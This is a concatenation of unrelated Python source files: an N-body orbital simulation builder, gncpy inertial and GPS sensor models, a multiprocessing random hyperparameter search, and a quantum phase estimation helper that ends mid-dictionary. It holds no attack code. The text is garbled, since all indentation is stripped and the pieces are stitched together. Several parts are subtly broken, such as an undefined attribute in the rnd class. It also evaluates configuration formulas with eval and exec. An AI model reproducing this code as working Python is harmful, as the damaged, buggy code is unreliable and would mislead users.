for i, j in attrs.items():
setattr(self, i, j)
def __str__(self):
return self.name
def __repr__(self):
return "<SpaceBody %s>" % self.name
@property
def radius(self):
return self._system.radius[self._index]
@radius.setter
def radius(self, value):
self._system.radius[self._index] = value
self._system.sumradius = np.add.outer(self._system.radius, self._system.radius)
@property
def closest(self):
return self._system.closest_body(self)
@property
def attractor(self):
return self._system.bodylist[self._system.attractor(self.idx)]
@property
def distance_to_closest(self):
return abs(self.r - self.closest.r)
@property
def rel_coord(self):
class Coord:
def __init__(self, body):
self.body = body
self.parent = self.body.closest
r = body.r - body.closest.r
self.u = (r / abs(r)).conjugate()
def __getattr__(self, attr):
return (getattr(self.body, attr) - getattr(self.parent, attr)) * self.u
return Coord(self)
# the following calculation are relative to another body assuming a 2-body system
def barycenter(self, body):
return (body.m * body.r + self.m * self.r) / (body.m + self.m)
def barycenter_vel(self, body):
return (body.m * body.v + self.m * self.v) / (body.m + self.m)
def rel_energy(self, body):
r = self.r - body.r
v = self.v - body.v
mm = self.m * body.m
epot = -G * mm / np.absolute(r)
ekin = 0.5 * self.m * np.absolute(v) ** 2
return (epot + ekin)
def escape_speed(self, body):
return math.sqrt(2 * G * body.m / np.absolute(body.r - self.r))
def eccentricity(self, body):
rel_pos = self.r - self.barycenter(body)
rel_velocity = self.v - self.barycenter_vel(body)
red_mass = (self.m + body.m) / (self.m * body.m)
ang_momentum = (rel_velocity.conjugate() * rel_pos).imag # cross vector
ecc2 = max(0, 1 + 2 * self.rel_energy(body) * ang_momentum ** 2 * red_mass / ((body.m * G) ** 2))
return math.sqrt(ecc2)
class SpaceShip(SpaceBody):
'''a body with acceleration command for use in NBodyCommandSystem'''
acc_command = BoundSystemDescriptor('acc_command')
@property
def acc_command_polar(self):
'''get the command in polar coordinate: r,phi in degres'''
a, phi = cmath.polar(self.acc_command)
return a, phi / math.pi * 180.
@acc_command_polar.setter
def acc_command_polar(self, command):
(acc, angle) = command
self.acc_command = cmath.rect(acc, angle / 180. * math.pi)
f = self.rel_coord
class BodyListSystem(NBodySystem):
def __init__(self, bodylist, coll_time_multiplier):
self.bodylist = bodylist
m = np.array([i.mass for i in bodylist], np.float64)
r = np.array([i.initialposition for i in bodylist], VECTORTYPE)
v = np.array([i.initialvelocity for i in bodylist], VECTORTYPE)
radius = np.array([i.initialradius for i in bodylist], np.float64)
for i, b in enumerate(self.bodylist):
b.bind(self, i)
NBodySystem.__init__(self, r, v, m, coll_time_multiplier)
@property
def parents(self):
return [body for body in self.bodylist if body.parent is None]
def closest_body(self, body, *ignore):
idx = self.closest(body.idx, [b.idx for b in ignore])
return self.bodylist[idx]
def check_body_collide(self):
return [(self.bodylist[i], self.bodylist[j], t) for i, j, t in self.check_collide() if i < j]
class BodyListCommandSystem(NBodyCommandSystem, BodyListSystem):
def __init__(self, bodylist, coll_time_multiplier):
self.bodylist = bodylist
m = np.array([i.mass for i in bodylist], np.float64)
r = np.array([i.initialposition for i in bodylist], VECTORTYPE)
v = np.array([i.initialvelocity for i in bodylist], VECTORTYPE)
radius = np.array([i.initialradius for i in bodylist], np.float64)
for i, b in enumerate(self.bodylist):
b.bind(self, i)
NBodyCommandSystem.__init__(self, r, v, m, radius, coll_time_multiplier)
class rnd:
def __init__(self):
self.vals = {}
self.last = random.random()
def __getitem__(self, i):
if not i in self.vals:
self.value[i] = random.random()
return self.value[i]
def rnd(self):
self.last = random.random()
return self.last
def get_context():
'''functions for use in the formulas in the configuration file'''
result = {}
import math, cmath, random
result.update(math.__dict__)
result.update(cmath.__dict__)
result.update(random.__dict__)
result['rnd'] = rnd()
return result
formula_context = get_context()
class NamedSystemBuilder(object):
'''object to build a system from a csv file'''
def __init__(self, *planets):
self.bodylist = []
self.bodymap = {}
self.add(*planets)
def getsystem(self, coll_time_multiplier):
return BodyListSystem(self.bodylist, coll_time_multiplier)
def makeplanet(self, name, distance, phaseindeg, direction, radius, mass, parentname, atm=False, cls=SpaceBody,
**attrs):
'''Creates a planet given the parameters. The parameters may be strings or formulas to eval.
name: name of the body. Doesn't have to be unique
distance: distance to the parent in m (the star for a planet, a placet for a satellite, etc) or (0,0)
phaseindeg: phase in degree.
direction: velocity of the body compared to the velocity required to stay in orbit.
Enter 1 for a circle orbit, 1j to go towards the parent
radius: radius in m
mass: mass in kg
parentname: name of the parent
atm: true is there is an atmosphere
cls: class to implement the body. SpaceBody by default, Spaceship for the spaceship
attrs: additional parameters directly passed to the constructor of cls.
'''
phase = phaseindeg / 180. * math.pi
if parentname == '--' or parentname == name:
parent = None
else:
parent = self.bodymap[parentname]
if parent:
distance += parent.initialradius
# find the velocity according to parameter "direction"
u = cmath.exp(1j * phase)
if parent is None:
velocity = 0j
position = distance * u
else:
position = distance * u + parent.initialposition
gravityfromparent = G * parent.mass / distance ** 2
velocity = math.sqrt(distance * gravityfromparent) * u * 1j * direction + parent.initialvelocity
attr = {}
if atm:
for i, j in attrs.items():
attr[i] = float(j)
return cls(name, position, velocity, mass, radius, parent, atm, **attr)
def makeplanet_eval(self, name, distance, phaseindeg, direction, radius, mass, parentname, atm='False',
cls=SpaceBody, **attrs):
global formula_context
name = name.strip()
parentname = parentname.strip()
distance = eval(distance, formula_context)
phaseindeg = eval(phaseindeg, formula_context)
direction = eval(direction, formula_context)
radius = eval(radius, formula_context)
mass = eval(mass, formula_context)
atm = atm.strip().lower() == 'true'
return self.makeplanet(name, distance, phaseindeg, direction, radius, mass, parentname, atm, cls, **attrs)
def readfile(self, filename):
'''read csv file'''
reader = csv.DictReader(open(filename), skipinitialspace=True)
for j in reader:
# print (j)
if j['name'].startswith("#"):
continue
if j['name'].strip() == 'Spaceship':
j['cls'] = SpaceShip
planet = self.makeplanet_eval(**j)
self.add(planet)
def execfile(self, filename):
context = formula_context.copy()
def make(*args, **kwargs):
self.add(self.makeplanet(*args, **kwargs))
context['make'] = make
context['SpaceShip'] = SpaceShip
exec(open(filename).read(), context)
def add(self, *planets):
for planet in planets:
self.bodylist.append(planet)
self.bodymap[planet.name] = planet
def getbodylist(self):
return self.bodylist
def main(filename):
b = NamedSystemBuilder()
b.readfile(filename)
s = b.getsystem(0.1)
rows = (('time', 't'),
('name', 'i.name'),
('x', 'i.r.real/1e6'),
('y', 'i.r.imag/1e6'),
('ditance', 'abs(i.r-getparentposition(i.parent))'),
('velocity', 'abs(i.v-getparentposition(i.parent))')
)
t = 0
TOTAL_T = 100000
N = 10
dt = TOTAL_T / N
en0 = s.energy()
for i in range(N):
steps, t = s.forward_fixed(t, t + dt, dt=1000)
en1 = s.energy()
print("Error on energy", (en1 - en0) / en0)
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
if sys.argv[1] == '-p':
print('profiling')
import cProfile
cProfile.run('main("planet.csv")', 'profile')
elif sys.argv[1][-4:] == '.csv':
main(sys.argv[1])
else:
main('missionmoon.csv')
|
<reponame>drjdlarson/gncpy<filename>gncpy/sensors.py
import abc
import io
import numpy as np
import gncpy.wgs84 as wgs84
from gncpy.orbital_mechanics import ecc_anom_from_mean, true_anom_from_ecc, \
correct_lon_ascend, ecef_from_orbit
from gncpy.coordinate_transforms import ecef_to_NED
"""
-------------------------------------------------------------------------------
------------------------------ Inertial Sensors -------------------------------
-------------------------------------------------------------------------------
"""
class InertialBase:
""" Defines basic functionality for inertial sensors.
This implements a basic measurement function and calculates the associated
bias, scale factor, and misalignment terms needed by an inertial sensor.
Attributes:
misalign_sig (list): Sigma values for the misalignment terms, 1 per
axis, assumes 3 axis
scale_factor_sig (list): Sigma values for the scale factor terms,
1 per axis, assumes 3 axis
corr_times (list): Correlation times for the bias, 1 per axis,
assumes 3 axis
gm_vars (list): Variance of the Gauss-Markov processes for each bias,
1 per axis, assumes 3 axis
sample_time (float): Sampling time of the Gauss-Markov process
init_bias_var (list): Variance of the initial bias value
wn_var (list): Variance of the white noise, 1 per axis, assumes 3 axis
"""
def __init__(self, **kwargs):
self.misalign_sig = kwargs.get('misalign_sig', [0, 0, 0])
self.scale_factor_sig = kwargs.get('scale_factor_sig', [0, 0, 0])
self.corr_times = kwargs.get('corr_times', [1, 1, 1])
self.gm_vars = kwargs.get('gm_vars', [0, 0, 0])
self.sample_time = kwargs.get('sample_time', 1)
self.init_bias_var = kwargs.get('init_bias_var', [0, 0, 0])
self.wn_var = kwargs.get('wn_var', [0, 0, 0])
self._sf = np.array([[]])
self._last_bias = np.array([[]])
self._gm_drive_sig = 0
def measure(self, true):
"""Returns measurements based on the true values.
Applies scale factor/misalignments, adds bias, and adds noise to true
values.
Args:
true (N x 1 numpy array): array of true sensor values, N <= 3
Returns:
(N x 1 numpy array): array of measured values, N <= 3
"""
noise = np.sqrt(np.array(self.wn_var)) * np.random.randn(3)
sf = self.calculate_scale_factor()
return sf @ true + self.calculate_bias() + noise.reshape((3, 1))
def calculate_bias(self):
""" Calculates the bias for each axis.
This assumes a Gauss-Markov model for the bias terms, see
:cite:`Quinchia2013_AComparisonbetweenDifferentErrorModelingofMEMSAppliedtoGPSINSIntegratedSystems`
"""
if self._last_bias.size == 0:
self._last_bias = (np.array(self.init_bias_var)
* np.random.randn(3))
self._last_bias.reshape((3, 1))
beta = 1 / np.array(self.corr_times)
var = np.array(self.gm_vars)
self._gm_drive_sig = np.sqrt(var * (1 - np.exp(-2
* self.sample_time
* beta)))
self._gm_drive_sig = self._gm_drive_sig.reshape((3, 1))
beta = (1 / np.array(self.corr_times)).reshape((3, 1))
w = self._gm_drive_sig * np.random.randn(3, 1)
bias = (1 - self.sample_time * beta) * self._last_bias + w
self._last_bias = bias
return bias
def calculate_scale_factor(self):
""" Calculates the scale factors and misalignment matrix.
"""
if self._sf.size == 0:
sf = np.array(self.scale_factor_sig) * np.random.randn(1, 3)
ma = np.zeros((3, 3))
for row in range(0, 3):
for col in range(0, 3):
if row == col:
continue
ma[row, col] = self.misalign_sig[row] * np.random.randn()
self._sf = np.eye(3) + np.diag(sf) + ma
return self._sf
"""
-------------------------------------------------------------------------------
------------------------------- GNSS Sensors ----------------------------------
-------------------------------------------------------------------------------
"""
class BaseSV(metaclass=abc.ABCMeta):
""" Base class for GNSS Space Vehicles.
Constellations should define their own SV class that properly accounts for
their propagation and error models. Inherited classes must define
:py:meth:`gncpy.sensors.BaseSV.propagate`
Attributes:
true_pos_ECEF (3 x 1 numpy array): Position of SV in ECEF coordinates
from orbital mechanics
real_pos_ECEF (3 x 1 numpy array): True position corrupted by errors
"""
def __init__(self, **kwargs):
self.true_pos_ECEF = np.array([[]])
self.real_pos_ECEF = np.array([[]])
@abc.abstractmethod
def propagate(self, time, **kwargs):
""" Calculates SV position at a given time.
This must be defined by child classes.
Args:
time (float): Time to find position
"""
pass
class BaseConstellation:
""" Base class for GNSS constellations.
Collects common functionality between different constellations and provides
a common interface.
Attributes:
sats (dict): Dictionary of :py:class:`gncpy.sensors.BaseSV` objects
"""
def __init__(self, **kwargs):
self.sats = {}
def propagate(self, time, **kwargs):
""" Propagate all SV's to the given time.
Attributes:
time (float): Time to find position
**kwargs : passed through to :py:meth:`gncpy.sensors.BaseSV.propagate`
"""
for k, v in self.sats.items():
self.sats[k].propagate(time, **kwargs)
class BaseGNSSReceiver(metaclass=abc.ABCMeta):
""" Defines the interface for common GNSS Receiver functions.
Attributes:
max_channels (int): Maximum number of signals to track
mask_angle (float): Masking angle in degrees
"""
def __init__(self, **kwargs):
self.max_channels = kwargs.get('max_channels', 12)
self.mask_angle = kwargs.get('mask_angle', 0)
@abc.abstractmethod
def measure_PR(self, true_pos, const, **kwargs):
pass
class GPSSat(BaseSV):
""" Custom SV for GPS Constellation.
Attributes:
health (str): satellite health
ecc (float): eccentricity
toe (float): time of applicability/ephemeris in seconds
inc (float): Orbital inclination in radians
ascen_rate (float): Rate of right ascension in rad/s
sqrt_a (float): Square root of semi-major axis in m^1/2
ascen (float): Right ascension at week in radians
peri (float): Argument of perigee in radians
mean_anom (float): Mean anomaly in radians
af0 (float): Zeroth order clock correction in seconds
af1 (float): First order cloc correction in sec/sec
week (int): Week number
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.health = ''
self.ecc = 0
self.toe = 0
self.inc = 0
self.ascen_rate = 0
self.sqrt_a = 0
self.ascen = 0
self.peri = 0
self.mean_anom = 0
self.af0 = 0
self.af1 = 0
self.week = 0
def propagate(self, time, **kwargs):
""" Calculates the GPS SV's position at the given time
Args:
time (float): Time of week to find position
"""
semimajor = self.sqrt_a**2
mean_motion = np.sqrt(wgs84.MU / semimajor**3)
tk = time - self.toe
if tk > 302400:
tk = tk - 604800
elif tk < -302400:
tk = tk + 604800
mean_anom = self.mean_anom + mean_motion * tk
ecc_anom = ecc_anom_from_mean(mean_anom, self.ecc, **kwargs)
true_anom = true_anom_from_ecc(ecc_anom, self.ecc)
arg_lat = true_anom + self.peri
cor_ascen = correct_lon_ascend(self.ascen, self.ascen_rate, tk,
self.toe)
rad = semimajor * (1 - self.ecc * np.cos(ecc_anom))
self.true_pos_ECEF = ecef_from_orbit(arg_lat, rad, cor_ascen, self.inc)
self.real_pos_ECEF = self.true_pos_ECEF.copy()
class GPSConstellation(BaseConstellation):
""" Handles the GPS constellation.
This maintains the satellite list, file parsing operations, and propagation
functions for the GPS satellite constellation.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
def parse_almanac(self, alm_f):
""" Parses an almanac file to setup constellation parameters.
Args:
alm_f (str): file path and name of almanac file
"""
cur_prn = ''
with io.open(alm_f, 'r') as fin:
for line in fin:
line = line.lower()
if "almanac" in line:
pass
elif "id" in line:
string = line.split(":")[1]
cur_prn = str(int(string.strip()))
self.sats[cur_prn] = GPSSat()
elif cur_prn and ":" in line:
val = line.split(":")[1].strip()
if "health" in line:
self.sats[cur_prn].health = val
elif "eccentricity" in line:
self.sats[cur_prn].ecc = float(val)
elif "applicability" in line:
self.sats[cur_prn].toe = float(val)
elif "inclination" in line:
self.sats[cur_prn].inc = float(val)
elif "rate of right" in line:
self.sats[cur_prn].ascen_rate = float(val)
elif "sqrt" in line:
self.sats[cur_prn].sqrt_a = float(val)
elif "right ascen" in line:
self.sats[cur_prn].ascen = float(val)
elif "argument" in line:
self.sats[cur_prn].peri = float(val)
elif "mean anom" in line:
self.sats[cur_prn].mean_anom = float(val)
elif "af0" in line:
self.sats[cur_prn].af0 = float(val)
elif "af1" in line:
self.sats[cur_prn].af1 = float(val)
elif "week" in line:
self.sats[cur_prn].week = int(val)
class GPSReceiver(BaseGNSSReceiver):
""" Emulates a GPS receiver.
Manages the measurement functions for a GPS reciever, and models receiver
and signal noise.
Attributes:
tracked_SVs (list): The PRNs of all SVs currently tracked
Todo:
Add PR error models
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.tracked_SVs = []
def measure_PR(self, true_pos, const, **kwargs):
""" Measures the pseudorange to each satellite in the constellation
Args:
true_pos (3 x 1 numpy array): True receiver position in ECEF
const (:py:class:`gncpy.sensors.GPSConstellation`): Constellation
to use, propagated to current time
Returns:
(dict): Keys are PRN's and values are pseudoranges in meters
Todo:
add error terms
"""
new_SVs = {}
for prn, sv in const.sats.items():
diff = sv.real_pos_ECEF - true_pos
los_NED = ecef_to_NED(true_pos, sv.real_pos_ECEF)
los_NED = los_NED / np.sqrt(los_NED.T @ los_NED)
elev = -np.arctan2(los_NED[2] / np.sqrt(los_NED[0]**2
+ los_NED[1]**2))
if elev >= self.mask_angle:
pr = np.sqrt(diff.T @ diff)
new_SVs[prn] = pr
tracked = {}
if len(new_SVs) >= self.max_channels:
for prn in new_SVs.keys():
if prn in self.tracked_SVs:
tracked[prn] = new_SVs[prn]
del new_SVs[prn]
if len(tracked) < self.max_channels and len(new_SVs) > 0:
for prn in new_SVs.keys():
if prn not in tracked:
tracked[prn] = new_SVs[prn]
if len(tracked) == self.max_channels:
break
self.tracked_SVs = tracked.keys()
return tracked
|
<filename>ParameterTuning/RandomSearch.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 10/03/2018
@author: <NAME>
"""
from ParameterTuning.AbstractClassSearch import AbstractClassSearch, DictionaryKeys, writeLog
from functools import partial
import traceback, pickle
import os, gc, math
import multiprocessing
from multiprocessing import Queue
from queue import Empty
def dump_garbage():
"""
show us what's the garbage about
"""
# force collection
print("\nGARBAGE:")
gc.collect()
print("\nGARBAGE OBJECTS:")
for x_pos in range(len(gc.garbage)):
x = gc.garbage[x_pos]
s = str(x)
if len(s) > 80: s = s[:80]
#print("type: {} \n\t s {} \n\t reffered by: {}".format(type(x), s, gc.get_referrers(x)))
print("POS: {}, type: {} \n\t s {} \n".format(x_pos, type(x), s))
print("\nDONE")
pass
# gc.enable()
# gc.set_debug(gc.DEBUG_LEAK)
import itertools, random, time
def get_RAM_status():
tot_m, used_m, free_m = map(int, os.popen('free -t -m').readlines()[-1].split()[1:])
return tot_m, used_m, free_m
def dereference_recommender_attributes(recommender_object):
if recommender_object is None:
return
object_attributes = recommender_object.__dict__
for key in object_attributes.keys():
object_attributes[key] = None
def get_memory_threshold_reached(max_ram_occupied_perc):
if max_ram_occupied_perc is not None:
tot_RAM, used_RAM, _ = get_RAM_status()
max_ram_occupied_bytes = tot_RAM*max_ram_occupied_perc
memory_threshold_reached = used_RAM > max_ram_occupied_bytes
memory_used_quota = used_RAM/tot_RAM
else:
memory_threshold_reached = False
memory_used_quota = 0.0
return memory_threshold_reached, memory_used_quota
import sys
class RandomSearch(AbstractClassSearch):
ALGORITHM_NAME = "RandomSearch"
def __init__(self, recommender_class, URM_test = None, evaluation_function_validation=None):
super(RandomSearch, self).__init__(recommender_class, URM_test = URM_test, evaluation_function_validation= evaluation_function_validation)
def build_all_cases_to_evaluate(self, n_cases):
hyperparamethers_range_dictionary = self.dictionary_input[DictionaryKeys.FIT_RANGE_KEYWORD_ARGS]
key_list = list(hyperparamethers_range_dictionary.keys())
# Unpack list ranges from hyperparamethers to validate onto
# * operator allows to transform a list of objects into positional arguments
test_cases = itertools.product(*hyperparamethers_range_dictionary.values())
paramether_dictionary_list = []
for current_case in test_cases:
paramether_dictionary_to_evaluate = {}
for index in range(len(key_list)):
paramether_dictionary_to_evaluate[key_list[index]] = current_case[index]
paramether_dictionary_list.append(paramether_dictionary_to_evaluate)
# Replicate list if necessary
paramether_dictionary_list = paramether_dictionary_list * math.ceil(n_cases/len(paramether_dictionary_list))
return paramether_dictionary_list
def search(self, dictionary_input, metric ="map", n_cases = 30, output_root_path = None, parallelPoolSize = None, parallelize = True,
save_model = "best", max_ram_occupied_perc = None):
# Associate the params that will be returned by BayesianOpt object to those you want to save
# E.g. with early stopping you know which is the optimal number of epochs only afterwards
# but you might want to save it as well
self.from_fit_params_to_saved_params = {}
self.dictionary_input = dictionary_input.copy()
self.output_root_path = output_root_path
self.logFile = open(self.output_root_path + "_" + self.ALGORITHM_NAME + ".txt", "a")
self.metric = metric
self.model_counter = 0
if max_ram_occupied_perc is None:
self.max_ram_occupied_perc = 0.7
else:
# Try if current ram status is possible to read
try:
get_RAM_status()
self.max_ram_occupied_perc = max_ram_occupied_perc
except:
writeLog(self.ALGORITHM_NAME + ": Unable to read RAM status, ignoring max RAM setting", self.logFile)
self.max_ram_occupied_perc = None
if save_model in ["no", "best", "all"]:
self.save_model = save_model
else:
raise ValueError(self.ALGORITHM_NAME + ": save_model not recognized, acceptable values are: {}, given is {}".format(
["no", "best", "all"], save_model))
if parallelPoolSize is None:
self.parallelPoolSize = 1
else:
#self.parallelPoolSize = int(multiprocessing.cpu_count()/2)
self.parallelPoolSize = parallelPoolSize
self.best_solution_val = None
self.best_solution_parameters = None
self.best_solution_object = None
paramether_dictionary_list = self.build_all_cases_to_evaluate(n_cases)
# Randomize ordering of cases
random.shuffle(paramether_dictionary_list)
self.runSingleCase_partial = partial(self.runSingleCase,
metric = metric)
if parallelize:
self.run_multiprocess_search(paramether_dictionary_list, n_cases)
else:
self.run_singleprocess_search(paramether_dictionary_list, n_cases)
writeLog(self.ALGORITHM_NAME + ": Best config is: Config {}, {} value is {:.4f}\n".format(
self.best_solution_parameters, metric, self.best_solution_val), self.logFile)
return self.best_solution_parameters.copy()
def update_on_new_result(self, process_object, num_cases_evaluated):
paramether_dictionary_to_save = self.from_fit_params_to_saved_params_function(process_object.recommender,
process_object.paramether_dictionary_to_evaluate)
if process_object.exception is not None:
writeLog(self.ALGORITHM_NAME + ": Exception for config {}: {}\n".format(
self.model_counter, paramether_dictionary_to_save, str(process_object.exception)), self.logFile)
return
if process_object.result_dict is None:
writeLog(self.ALGORITHM_NAME + ": Result is None for config {}\n".format(
self.model_counter, paramether_dictionary_to_save), self.logFile)
return
self.model_counter += 1
# Always save best model separately
if self.save_model == "all":
print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path))
process_object.recommender.saveModel(self.output_root_path, file_name="_model_{}".format(self.model_counter))
pickle.dump(paramether_dictionary_to_save.copy(),
open(self.output_root_path + "_parameters_{}".format(self.model_counter), "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
if self.best_solution_val == None or self.best_solution_val<process_object.result_dict[self.metric]:
writeLog(self.ALGORITHM_NAME + ": New best config found. Config {}: {} - results: {}\n".format(
self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)
pickle.dump(paramether_dictionary_to_save.copy(),
open(self.output_root_path + "_best_parameters", "wb"),
protocol=pickle.HIGHEST_PROTOCOL)
self.best_solution_val = process_object.result_dict[self.metric]
self.best_solution_parameters = paramether_dictionary_to_save.copy()
dereference_recommender_attributes(self.best_solution_object)
self.best_solution_object = process_object.recommender
# Always save best model separately
if self.save_model != "no":
print(self.ALGORITHM_NAME + ": Saving model in {}\n".format(self.output_root_path))
process_object.recommender.saveModel(self.output_root_path, file_name="_best_model")
if self.URM_test is not None:
self.evaluate_on_test(self.URM_test)
else:
writeLog(self.ALGORITHM_NAME + ": Config is suboptimal. Config {}: {} - results: {}\n".format(
self.model_counter, paramether_dictionary_to_save, process_object.result_dict), self.logFile)
dereference_recommender_attributes(process_object.recommender)
#dump_garbage()
def run_singleprocess_search(self, paramether_dictionary_list, num_cases_max):
num_cases_evaluated = 0
while num_cases_evaluated < num_cases_max:
process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input,
paramether_dictionary_list[num_cases_evaluated],
self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function_validation)
process_object.run("main")
self.update_on_new_result(process_object, num_cases_evaluated)
process_object = None
#gc.collect()
#dump_garbage()
num_cases_evaluated += 1
def run_multiprocess_search(self, paramether_dictionary_list, num_cases_max):
# Te following function runs the search in parallel. As different configurations might have signifiantly divergent
# runtime threads must be joined from the first to terminate and the objects might be big, therefore parallel.pool is not suitable
num_cases_evaluated = 0
num_cases_started = 0
num_cases_active = 0
termination_sent = False
process_list = [None] * self.parallelPoolSize
queue_job_todo = Queue()
queue_job_done = Queue()
get_memory_threshold_reached_partial = partial(get_memory_threshold_reached,
max_ram_occupied_perc = self.max_ram_occupied_perc)
for current_process_index in range(self.parallelPoolSize):
newProcess = multiprocessing.Process(target=process_worker, args=(queue_job_todo, queue_job_done, current_process_index, get_memory_threshold_reached_partial, ))
process_list[current_process_index] = newProcess
newProcess.start()
newProcess = None
print("Started process: {}".format(current_process_index))
memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)
while num_cases_evaluated < num_cases_max:
# Create as many new jobs as needed
# Stop: if the max number of paralle processes is reached or the max ram occupancy is reached
# if no other cases to explore
# If no termination sent and active == 0, start one otherwise everything stalls
# WARNING: apparently the function "queue_job_todo.empty()" is not reliable
while ((num_cases_active < self.parallelPoolSize and not memory_threshold_reached) or (num_cases_active == 0)) \
and not termination_sent:
memory_threshold_reached, memory_used_quota = get_memory_threshold_reached(self.max_ram_occupied_perc)
if memory_threshold_reached:
writeLog(self.ALGORITHM_NAME + ": Memory threshold reached, occupied {:.4f} %\n".format(memory_used_quota), self.logFile)
if num_cases_started < num_cases_max and not memory_threshold_reached:
process_object = Process_object_data_and_evaluation(self.recommender_class, self.dictionary_input,
paramether_dictionary_list[num_cases_started],
self.ALGORITHM_NAME, self.URM_validation, self.evaluation_function)
queue_job_todo.put(process_object)
num_cases_started += 1
num_cases_active += 1
process_object = None
if num_cases_started >= num_cases_max and not termination_sent:
print("Termination sent")
queue_job_todo.put(None)
termination_sent = True
# Read all completed jobs. WARNING: apparently the function "empty" is not reliable
queue_job_done_is_empty = False
while not queue_job_done_is_empty:
try:
process_object = queue_job_done.get_nowait()
self.update_on_new_result(process_object, num_cases_evaluated)
num_cases_evaluated += 1
num_cases_active -=1
process_object = None
except Empty:
queue_job_done_is_empty = True
time.sleep(1)
#print("num_cases_evaluated {}".format(num_cases_evaluated))
#print("Evaluated {}, started {}, active {}".format(num_cases_evaluated, num_cases_started, num_cases_active))
queue_job_todo.get()
for current_process in process_list:
#print("Waiting to Join {}".format(current_process))
current_process.join()
print("Joined {}".format(current_process))
def process_worker(queue_job_todo, queue_job_done, process_id, get_memory_threshold_reached):
"Function to be used by the process, just run the wrapper object"
process_object = queue_job_todo.get()
memory_threshold_warning_printed = False
while process_object is not None:
# # Avoid queue.put to prevent process termination until all queue elements have been pulled
# queue.cancel_join_thread()
# Wait until there is enough RAM
memory_threshold_reached, memory_used_quota = get_memory_threshold_reached()
if not memory_threshold_reached:
memory_threshold_warning_printed = False
process_object.run(process_id)
# "Send" result object ro main process
queue_job_done.put(process_object)
# Dereference
process_object = None
process_object = queue_job_todo.get()
else:
if not memory_threshold_warning_printed:
memory_threshold_warning_printed = True
print("Process: {} - Memory threshold reached, occupied {:.4f} %\n".format(process_id, memory_used_quota))
time.sleep(5)
#Ensure termination signal stays in queue
queue_job_todo.put(None)
# Termination signal
print("Process: {} - Termination signal received".format(process_id))
return
class Process_object_data_and_evaluation(object):
def __init__(self, recommender_class, dictionary_input, paramether_dictionary_to_evaluate, ALGORITHM_NAME,
URM_validation, evaluation_function):
super(Process_object_data_and_evaluation, self).__init__()
self.recommender_class = recommender_class
self.URM_validation = URM_validation
self.dictionary_input = dictionary_input.copy()
self.paramether_dictionary_to_evaluate = paramether_dictionary_to_evaluate.copy()
self.ALGORITHM_NAME = ALGORITHM_NAME
self.evaluation_function = evaluation_function
self.exception = None
self.recommender = None
self.result_dict = None
def __del__(self):
# self.recommender_class = None
# self.URM_validation = None
# self.dictionary_input.clear()
# self.paramether_dictionary_to_evaluate = None
# self.ALGORITHM_NAME = None
# self.evaluation_function = None
# self.exception = None
# self.recommender = None
# self.result_dict = None
object_attributes = self.__dict__
for key in object_attributes.keys():
object_attributes[key] = None
def run(self, process_id):
try:
# Create an object of the same class of the imput
# Passing the paramether as a dictionary
self.recommender = self.recommender_class(*self.dictionary_input[DictionaryKeys.CONSTRUCTOR_POSITIONAL_ARGS],
**self.dictionary_input[DictionaryKeys.CONSTRUCTOR_KEYWORD_ARGS])
print(self.ALGORITHM_NAME + ": Process {} Config: {}".format(
process_id, self.paramether_dictionary_to_evaluate))
self.recommender.fit(*self.dictionary_input[DictionaryKeys.FIT_POSITIONAL_ARGS],
**self.dictionary_input[DictionaryKeys.FIT_KEYWORD_ARGS],
**self.paramether_dictionary_to_evaluate)
self.result_dict = self.evaluation_function(self.recommender, self.URM_validation, self.paramether_dictionary_to_evaluate)
print(self.ALGORITHM_NAME + ": Process {} Completed config: {} - result {}".format(
process_id, self.paramether_dictionary_to_evaluate, self.result_dict))
#self.result_dict = {"map": 0.0}
return
except Exception as exception:
traceback.print_exc()
print(self.ALGORITHM_NAME + ": Process {} Exception {}".format(
process_id, str(exception)))
self.result_dict = None
self.exception = exception
|
import numpy as np
import cmath
import string
from src.quantum_phase_estimation.quantumdecomp.quantum_decomp import matrix_to_qasm
from src.quantum_phase_estimation.quantumdecomp.quantum_decomp import U_to_CU
from src.quantum_phase_estimation.util_functions import change_domain
def get_unitary_operators_array(operator, nancillas, qubits):
arg = None
if isinstance(operator, list):
arg = operator[1]
operator = operator[0]
if isinstance(operator, (np.ndarray, np.generic)):
# It is a matrix
matrix = operator
elif 'QASM' in operator:
array = []
for i in range(1, nancillas + 1):
power = 2 ** (nancillas - i)
operation = '\n'.join(operator.split('\n')[1:])
result_operation = operation
for j in range(power - 1):
result_operation += operation
result_operation = 'QASM\n' + U_to_CU(qubits, i - 1, nancillas, result_operation)
array.append(result_operation)
return array
else:
# It is an generator key
matrix = operator_to_matrix(operator, arg)
array = []
for i in range(1, nancillas + 1):
power = 2**(nancillas - i)
result_matrix = matrix
for j in range(power - 1):
result_matrix = np.dot(matrix, result_matrix)
#result_matrix = result_matrix.round(decimals=9)
result_operator = matrix_to_operator(result_matrix)
#print(result_matrix)
if 'Invalid' in result_operator:
result_operator = matrix_to_qasm(result_matrix, i-1, nancillas)
# else:
# # This means there is an argument
# if ' ' in result_operator:
# parts = result_operator.split(' ')
# result_operator = f'{parts[0]} q[{nancillas}], {parts[1]}'
# else:
# result_operator = f'{result_operator} q[{nancillas}]'
# result_operator = 'QASM\n' + U_to_CU(qubits, i - 1, nancillas, result_operator + '\n')
array.append(result_operator)
return array
def operator_to_matrix(operator, arg=None):
if arg is not None:
arg = float(arg)
return {
'Rx': np.array([[cmath.cos(arg / 2), -1j * cmath.sin(arg / 2)],
[1j * cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
'Ry': np.array([[cmath.cos(arg / 2), -cmath.sin(arg / 2)],
[cmath.sin(arg / 2), cmath.cos(arg / 2)]]),
'Rz': np.array([[cmath.exp(-1j * arg / 2), 0],
[0, cmath.exp(1j * arg / 2)]]),
'CR': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, cmath.exp(arg * 1j)]]),
'CRk': np.array([[1, 0, 0, 0],
[0, 1, 0, 0],
